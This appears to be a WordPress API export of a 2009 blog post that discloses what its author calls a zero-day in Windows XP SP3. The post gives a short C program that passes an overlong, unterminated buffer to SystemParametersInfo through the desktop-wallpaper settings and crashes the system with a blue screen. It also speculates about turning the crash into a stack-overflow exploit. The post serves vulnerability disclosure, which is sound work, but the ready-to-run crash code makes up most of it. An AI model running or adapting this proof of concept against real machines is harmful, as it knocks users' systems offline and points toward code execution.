{"id":78,"date":"2009-02-02T06:09:14","date_gmt":"2009-02-02T08:09:14","guid":{"rendered":"http:\/\/www.ragestorm.net\/blogs\/?p=78"},"modified":"2009-09-17T22:35:19","modified_gmt":"2009-09-18T00:35:19","slug":"oh-no-my-xpsp3","status":"publish","type":"post","link":"https:\/\/www.ragestorm.net\/blogs\/?p=78","title":{"rendered":"Oh No, My XPSP3"},"content":{"rendered":"<pre lang=\"c\">#include &lt;windows.h&gt;\r\nint main()\r\n{\r\n\u00a0WCHAR c[1000] = {0};\r\n\u00a0memset(c, 'c', 1000);\r\n\u00a0SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0);\r\n\r\n WCHAR b[1000] = {0};\r\n\u00a0SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0);\r\n\u00a0return 0;\r\n}<\/pre>\n<p>Two posts ago I talked about <a href=\"http:\/\/www.ragestorm.net\/blogs\/?p=75\">vulnerabilities<\/a>. So here&#8217;s some Zero Day. This will crash your system, unless you&#8217;re on Vista (which is already immune to it). And why the heck on SP3 we are still having this thing not closed yet?<\/p>\n<p>It might be exploitable, I didn&#8217;t research it any further than the BSOD of the security cookie&#8230;Maybe on some compilations without \/GS it can be easily exploited. Or maybe overriding enough of the stack to trigger an exception could be it.<\/p>\n<p><font size=\"1\">&#8220;Remember to let her into your heart,<br \/>\nThen you can start to make it better&#8221; &#8211; The Beatles.<\/font><\/p>\n","protected":false},"excerpt":{"rendered":"<p>#include &lt;windows.h&gt; int main() { \u00a0WCHAR c[1000] = {0}; \u00a0memset(c, &#8216;c&#8217;, 1000); \u00a0SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, (PVOID)c, 0); WCHAR b[1000] = {0}; \u00a0SystemParametersInfo(SPI_GETDESKWALLPAPER, 1000, (PVOID)b, 0); \u00a0return 0; } Two posts ago I talked about vulnerabilities. So here&#8217;s some Zero Day. This will crash your system, unless you&#8217;re on Vista (which is already immune to it). And [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"spay_email":"","jetpack_publicize_message":""},"categories":[19,13,17,7],"tags":[],"jetpack_featured_media_url":"","jetpack_publicize_connections":[],"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbWKd-1g","_links":{"self":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts\/78"}],"collection":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=78"}],"version-history":[{"count":5,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts\/78\/revisions"}],"predecessor-version":[{"id":100,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=\/wp\/v2\/posts\/78\/revisions\/100"}],"wp:attachment":[{"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=78"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=78"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ragestorm.net\/blogs\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=78"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}